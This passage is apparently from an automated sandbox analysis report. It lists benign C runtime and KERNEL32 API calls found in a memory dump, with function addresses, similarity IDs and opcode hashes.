                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4040
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF406B
                                                                                                          • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6FDF4089
                                                                                                          • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6FDF408F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ?_inconsistency@@$?raw_name@type_info@@?terminate@@DecodePointerstrcmp
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2672297707-1018135373
                                                                                                          APIs
                                                                                                          • DeleteCriticalSection.KERNEL32(0000000C,?,?,6FD97B83), ref: 6FDF6D9B
                                                                                                          • free.MSVCR100(6FE24740,?,?,6FD97B83), ref: 6FDF6DB4
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                          • String ID: @Go$@Ho
                                                                                                          • API String ID: 2988086103-495180618
                                                                                                          APIs
                                                                                                          • free.MSVCR100(00000000,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96E86
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96E98
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96EAA
                                                                                                          • free.MSVCR100(6FD852B8,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96EBC
                                                                                                          • free.MSVCR100(?,?,?,6FD96F2D,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96ECE
                                                                                                          Similarity
                                                                                                          • API ID: free$FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 32654580-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFEAE7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFEAF2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFEB0B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFEB16
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          APIs
                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6FD8C0AF
                                                                                                          • GetCPInfo.KERNEL32(00000000,?), ref: 6FD8C0C2
                                                                                                          • memset.MSVCR100(0000001D,00000000,00000101), ref: 6FD8C0DA
                                                                                                          • memset.MSVCR100(0000001D,00000000,00000101,00000000,?,00000000), ref: 6FDAA8ED
                                                                                                          Similarity
                                                                                                          • API ID: memset$CodeInfoPageValid
                                                                                                          • String ID:
                                                                                                          • API String ID: 344587817-0
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6FDB6DA2
                                                                                                          • memset.MSVCR100(00000000,00000000,?,00000000,00000000), ref: 6FDB6DB5
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6FDB6DBC
                                                                                                          • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6FDB6E07
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,765130B0,?,?,6FDC0F0E), ref: 6FDC0F81
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?), ref: 6FDC1062
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC106F
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDC864
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDC86F
                                                                                                          • _isctype_l.MSVCR100(?,00000008,?), ref: 6FDDC89D
                                                                                                          • _errno.MSVCR100 ref: 6FDDC921
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDC844F
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC8484
                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?,?), ref: 6FDC8492
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?), ref: 6FDC8567
                                                                                                          APIs
                                                                                                          • _isctype_l.MSVCR100(7FFFFFFF,00000001,00000000,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAA2E4
                                                                                                          • _isleadbyte_l.MSVCR100(00000008,00000000,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E), ref: 6FDAA320
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E), ref: 6FDAA36D
                                                                                                          APIs
                                                                                                          • _isctype_l.MSVCR100(?,00000002,?), ref: 6FDDCD4C
                                                                                                          • _isleadbyte_l.MSVCR100(00000008,?), ref: 6FDDCDAD
                                                                                                          • _errno.MSVCR100 ref: 6FDDCDCA
                                                                                                          • __crtLCMapStringA.MSVCR100(?,?,00000200,?,00000001,?,00000003,?,00000001), ref: 6FDDCDFE
                                                                                                          APIs
                                                                                                          • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB652C
                                                                                                            • Part of subcall function 6FDB6E52: ?_SetSpinCount@?$_SpinWait@$0A@@details@Concurrency@@QAEXI@Z.MSVCR100(00000FA0,00000FA0,?,6FDBAB8A,00000000), ref: 6FDB6E6C
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB6572
                                                                                                          • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB65C2
                                                                                                          • Sleep.KERNEL32(00000001,6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB), ref: 6FDB65E2
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE05DD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE05E8
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy.MSVCR100(?,?,?,?,?), ref: 6FDE0614
                                                                                                          • memset.MSVCR100(?,00000000,?,?,?), ref: 6FDE065A
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDC641F
                                                                                                          • WaitForSingleObject.KERNEL32(?,?), ref: 6FDC6443
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6FDC6478
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC6524
                                                                                                          APIs
                                                                                                          • _strnset.MSVCR100(?,?,?,?), ref: 6FDE0909
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDE0932
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDE093D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_strnset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2423426979-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DEE
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DF8
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DFF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96E06
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB0531
                                                                                                          • __doserrno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB053C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 4219055303-0
                                                                                                          APIs
                                                                                                          • _towlower_l.MSVCR100(?,?,?), ref: 6FD90E07
                                                                                                            • Part of subcall function 6FD8254C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6FD82590
                                                                                                          • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6FD90E17
                                                                                                          • _errno.MSVCR100 ref: 6FDAC6C3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC6CE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                                                                                          • String ID:
                                                                                                          • API String ID: 2204055994-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE0E7B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE0E86
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy.MSVCR100(?,?,?,?), ref: 6FDE0EB4
                                                                                                          • memset.MSVCR100(?,00000000,00000000,?,?), ref: 6FDE0EFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfomemsetstrncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3764360596-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDBA7F9: fabs.MSVCR100(00000000,00000000,00000000,00000000,?,6FDBA727,00000000,00000000,?,6FDBA51B), ref: 6FDBA831
                                                                                                          • sqrt.MSVCR100(?,?,?,?,?), ref: 6FDBA6AF
                                                                                                          • fabs.MSVCR100(?,?,?,?,?), ref: 6FDBA6BD
                                                                                                          • fabs.MSVCR100(?,?,?,?,?), ref: 6FDBA6DE
                                                                                                          • exp.MSVCR100(?,?,?,?,?), ref: 6FDBA6EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: fabs$sqrt
                                                                                                          • String ID:
                                                                                                          • API String ID: 372720774-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno$LocalTime_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 250023431-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDF0D04
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDF0D0F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _tolower_l.MSVCR100(00000000,?,?), ref: 6FDF0D6A
                                                                                                          • _tolower_l.MSVCR100(00000000,?,00000000,?,?), ref: 6FDF0D7A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _tolower_l$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1430126910-0
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FD91E07
                                                                                                          • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FD91E3E
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FDA8E8D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FDA8E98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 1803847835-0
                                                                                                          • Opcode ID: 4abcfa46a5de5ee611e55f03d8709cf21bc9c58a21a2fa80024905b554f78a94
                                                                                                          • Instruction ID: 6f152bd843634a6333c34baea599e02f1d2080bea5cdecc65f809a80c34595f6
                                                                                                          • Opcode Fuzzy Hash: 4abcfa46a5de5ee611e55f03d8709cf21bc9c58a21a2fa80024905b554f78a94
                                                                                                          • Instruction Fuzzy Hash: F821E271A44706DAE7A08FA5C58579E7BA4AF01338F20871AD8729B1D0DB3BF641CB94
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000028,6FDBEF6A,00000000,?,00000000), ref: 6FDC2ECD
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6FDC2EF2
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC2F4F
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6FDC2F5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: fbe2e23f5c76b41db5f3a55af3aa35943033447bd64c4d576bcd411ac31eac5a
                                                                                                          • Instruction ID: d108764d3691d0fba37c0f28ef2df8e663bda022cbece66383b145e2105b9fcb
                                                                                                          • Opcode Fuzzy Hash: fbe2e23f5c76b41db5f3a55af3aa35943033447bd64c4d576bcd411ac31eac5a
                                                                                                          • Instruction Fuzzy Hash: CC21A571601309DFDB88CF7AC595A6EB7F8BF4531AB10566AE451DB1A0DB30F900CB21
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDC858A
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC85B7
                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?,?), ref: 6FDC85C5
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?), ref: 6FDC8622
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@CurrentExceptionThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3517358164-0
                                                                                                          • Opcode ID: 59186ef4c02a09c62ef867c94c494fb7285397f9138240b105c31ea8829d9eaf
                                                                                                          • Instruction ID: 25bdc9f6631b6cde1a407041fa7df4e8df9834d60295bac17c50f5f2834ee608
                                                                                                          • Opcode Fuzzy Hash: 59186ef4c02a09c62ef867c94c494fb7285397f9138240b105c31ea8829d9eaf
                                                                                                          • Instruction Fuzzy Hash: 1A21C0B5508385DFCB92DFA8C8D4DAEBBB8AF41304B04482ED1529B241D7B0F549CB62
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 9cb5d0bc03f75acf702224edc93ec18035c9734200fcff1bb3d4aa36f852af64
                                                                                                          • Instruction ID: 98ff323ce07807b37c1515636df28621ddba7fbc9c15becf3e329f7232e2597e
                                                                                                          • Opcode Fuzzy Hash: 9cb5d0bc03f75acf702224edc93ec18035c9734200fcff1bb3d4aa36f852af64
                                                                                                          • Instruction Fuzzy Hash: 38119D36A00716EBCBA19F78C804A9B77B1EF40B64F111A1AFC648B290D330F950C7E6
                                                                                                          APIs
                                                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B1E
                                                                                                          • QueryDepthSList.KERNEL32(00000148,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B32
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B54
                                                                                                          • InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 94243546-0
                                                                                                          • Opcode ID: d6c53e575395ab4cef175934d5d03abdccd88d09edebe051de7f1eb20938099b
                                                                                                          • Instruction ID: 49681c8ae24ae4aecc5682058cc93335ba31db28e0b6b175992f19afbb23f8d6
                                                                                                          • Opcode Fuzzy Hash: d6c53e575395ab4cef175934d5d03abdccd88d09edebe051de7f1eb20938099b
                                                                                                          • Instruction Fuzzy Hash: 7F21D1B2900710DBEB50CF20C889B9E77F8AF42769F040569E84BCB190CB74FA04CB61
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD8CD60,00000014), ref: 6FD8CD0C
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?,6FD8CD60,00000014), ref: 6FD8CD21
                                                                                                          • _errno.MSVCR100(6FD8CD60,00000014), ref: 6FD92A90
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8CD60,00000014), ref: 6FDA86B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3916178533-0
                                                                                                          • Opcode ID: 6e95bd6286dc2649f92d34cc4a40dfd4499a9fc17877da95c5715610eb44bbbb
                                                                                                          • Instruction ID: 0892f09178075dd6a3db108a7e9424b3db9dc7a19da6d0ebd4e163edeb7916b9
                                                                                                          • Opcode Fuzzy Hash: 6e95bd6286dc2649f92d34cc4a40dfd4499a9fc17877da95c5715610eb44bbbb
                                                                                                          • Instruction Fuzzy Hash: D111C875A01346DFCBE06FB9C4804AD77B0AF04319B11863FD5769B180D338B5818B94
                                                                                                          APIs
                                                                                                          • _initterm_e.MSVCR100(6FD8C498,?,?,6FD8B911,00000000), ref: 6FD8C440
                                                                                                          • atexit.MSVCR100(6FDA70E0,?,6FD8B911,00000000), ref: 6FD8C450
                                                                                                          • _initterm.MSVCR100(6FD8C46C,6FDA70E0,?,6FD8B911,00000000), ref: 6FD8C461
                                                                                                          • _calloc_crt.MSVCR100(00000004), ref: 6FD8C4BC
                                                                                                          • _calloc_crt.MSVCR100(00000014,00000004), ref: 6FDA8875
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _calloc_crt$_initterm_initterm_eatexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1478392991-0
                                                                                                          • Opcode ID: 42f584771e0b84d329de1b5a99d0e46ed9f1e5ad500cc63e18e75a57fecab2c4
                                                                                                          • Instruction ID: 4d5a4354128eed1a0e9e8ef249bc26081c087e4a73157d658010c54059411e25
                                                                                                          • Opcode Fuzzy Hash: 42f584771e0b84d329de1b5a99d0e46ed9f1e5ad500cc63e18e75a57fecab2c4
                                                                                                          • Instruction Fuzzy Hash: 9411237500D7818FF38B2B38AD229697F72AF43628715419FC4A0CB292EB217184872A
                                                                                                          APIs
                                                                                                          • _ftelli64_nolock.MSVCR100(?), ref: 6FDD42FC
                                                                                                          • _fileno.MSVCR100(?,?,?,?), ref: 6FDD433E
                                                                                                          • _lseeki64.MSVCR100(00000000,?,?,?), ref: 6FDD4345
                                                                                                          • _errno.MSVCR100 ref: 6FDD4358
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fileno_ftelli64_nolock_lseeki64
                                                                                                          • String ID:
                                                                                                          • API String ID: 1192294219-0
                                                                                                          • Opcode ID: 140ddfbba7aa71d6ccca8f112891bc2ee516aeeec33b6ff1cab8229a1725755d
                                                                                                          • Instruction ID: e9faa46762bfda65bf9cb21e7682f89bf520c1ebac7f7181f36b0a41cd3c13b1
                                                                                                          • Opcode Fuzzy Hash: 140ddfbba7aa71d6ccca8f112891bc2ee516aeeec33b6ff1cab8229a1725755d
                                                                                                          • Instruction Fuzzy Hash: B111A032980744EFDBA1AF2DD844A9E3766BF83374B19860AF878971E0C735F0128760
                                                                                                          APIs
